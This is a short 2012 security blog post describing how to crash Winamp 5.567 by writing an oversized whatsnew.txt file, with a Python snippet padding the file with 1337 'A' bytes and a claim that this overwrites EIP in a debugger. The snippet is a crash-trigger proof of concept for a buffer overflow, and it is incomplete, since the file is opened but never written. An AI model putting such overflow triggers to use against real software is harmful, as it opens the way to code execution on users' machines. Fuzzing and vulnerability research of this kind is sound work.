Monday, 1 October 2012

BOF Winamp

Posted by at 10:03 Read our previous post
To make Winamp crash, you can use some method like making fuzzer for loadable file/configuration in winamp.
In this case, I will making fuzzer with modify whatsnew.txt file inside of Winamp directory.

filename = "whatsnew.txt"
header = "Winamp 5.567"
start = "*"
buffer = "\x41" * 1337

sploit = header + start + buffer
file = open(filename,'w')

You can see that variable header contain string "Winamp 5.567", this is a header file of Whatnews.txt for options box when you select the version history.

Now, open your Winamp and attach into Ollydbg or Immunity Dbg.
And see, what happened in the memory? EIP was overwriten :D

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template